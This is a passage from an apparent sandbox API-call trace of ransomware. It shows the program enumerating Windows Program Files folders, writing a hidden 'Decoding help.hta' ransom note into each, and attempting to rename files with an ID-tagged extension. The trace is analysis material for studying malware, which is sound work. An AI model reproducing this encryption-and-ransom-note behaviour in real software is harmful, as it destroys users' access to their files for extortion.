lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.854] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_color48.jpg") returned -1 [0042.854] lstrlenW (lpString="wmpnss_color48.jpg") returned 18 [0042.854] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_color48.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg" [0042.855] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg" [0042.855] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0042.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.855] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4702c0, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf4702c0, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1532, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.png", cAlternateFileName="")) returned 1 [0042.855] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.855] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.855] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.855] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_color48.png") returned -1 [0042.855] lstrlenW (lpString="wmpnss_color48.png") returned 18 [0042.855] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.855] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_color48.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png" [0042.855] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png" [0042.855] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png.[ID]g9uZrLhJaygpwRm1[ID]" [0042.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.855] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4702c0, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf4702c0, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1532, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.png", cAlternateFileName="")) returned 0 [0042.855] FindClose (in: hFindFile=0x5db338 | out: hFindFile=0x5db338) returned 1 Thread: id = 260 os_tid = 0x934 [0040.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*", lpFindFileData=0x1341fd30 | out: lpFindFileData=0x1341fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7e90 [0040.636] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.636] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x1341fd30 | out: lpFindFileData=0x1341fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.636] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.636] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.636] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x1341fd30 | out: lpFindFileData=0x1341fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll.mui", cAlternateFileName="")) returned 1 [0040.636] lstrcpyW (in: lpString1=0x109a0938, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" [0040.636] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned 46 [0040.636] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Decoding help.hta" [0040.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\en-us\\decoding help.hta")) returned 0xffffffff [0040.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.836] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1341fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1341fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.837] CloseHandle (hObject=0x33c) returned 1 [0040.837] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.289] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sbdrop.dll.mui") returned -1 [0041.290] lstrlenW (lpString="sbdrop.dll.mui") returned 14 [0041.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" [0041.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned 46 [0041.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\", lpString2="sbdrop.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui" [0041.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui" [0041.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui" (normalized: "c:\\program files\\windows sidebar\\en-us\\sbdrop.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\sbdrop.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\en-us\\sbdrop.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.290] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x1341fd30 | out: lpFindFileData=0x1341fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 1 [0041.290] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" [0041.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned 46 [0041.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Decoding help.hta" [0041.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\en-us\\decoding help.hta")) returned 0x1 [0041.290] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Sidebar.exe.mui") returned -1 [0041.290] lstrlenW (lpString="Sidebar.exe.mui") returned 15 [0041.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" [0041.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned 46 [0041.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\", lpString2="Sidebar.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui" [0041.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui" [0041.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui" (normalized: "c:\\program files\\windows sidebar\\en-us\\sidebar.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\Sidebar.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\en-us\\sidebar.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.295] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x1341fd30 | out: lpFindFileData=0x1341fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 0 [0041.295] FindClose (in: hFindFile=0x5d7e90 | out: hFindFile=0x5d7e90) returned 1 Thread: id = 261 os_tid = 0x940 [0040.643] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*", lpFindFileData=0x1355fd30 | out: lpFindFileData=0x1355fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9874cd8b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9874cd8b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0042.030] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.031] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1355fd30 | out: lpFindFileData=0x1355fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9874cd8b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9874cd8b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.031] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.031] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.031] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1355fd30 | out: lpFindFileData=0x1355fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9277700, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9277700, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9277700, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 1 [0042.031] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*" [0042.031] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*") returned 51 [0042.031] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Decoding help.hta" [0042.031] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\skins\\decoding help.hta")) returned 0xffffffff [0042.031] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\skins\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4fc [0042.031] WriteFile (in: hFile=0x4fc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1355fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1355fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.032] CloseHandle (hObject=0x4fc) returned 1 [0042.033] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.034] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Revert.wmz") returned -1 [0042.034] lstrlenW (lpString="Revert.wmz") returned 10 [0042.034] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*" [0042.034] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\*.*") returned 51 [0042.034] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\", lpString2="Revert.wmz" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz" [0042.034] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz" [0042.034] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz.[ID]g9uZrLhJaygpwRm1[ID]" [0042.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz" (normalized: "c:\\program files\\windows media player\\skins\\revert.wmz"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Skins\\Revert.wmz.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\skins\\revert.wmz.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.034] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1355fd30 | out: lpFindFileData=0x1355fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9277700, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9277700, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9277700, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 0 [0042.034] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 262 os_tid = 0x924 [0040.643] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*", lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8150 [0040.837] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.838] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.838] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.838] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.838] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5570eaa, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5570eaa, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x46a6d3e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x155e, dwReserved0=0x0, dwReserved1=0x0, cFileName="blank.jtp", cAlternateFileName="")) returned 1 [0041.294] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0xffffffff [0041.295] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0041.297] WriteFile (in: hFile=0x2ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x908fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x908fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.298] CloseHandle (hObject=0x2ec) returned 1 [0041.298] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.299] lstrcmpiW (lpString1="Decoding help.hta", lpString2="blank.jtp") returned 1 [0041.299] lstrlenW (lpString="blank.jtp") returned 9 [0041.299] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.299] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.299] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="blank.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp" [0041.299] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\blank.jtp" | out: 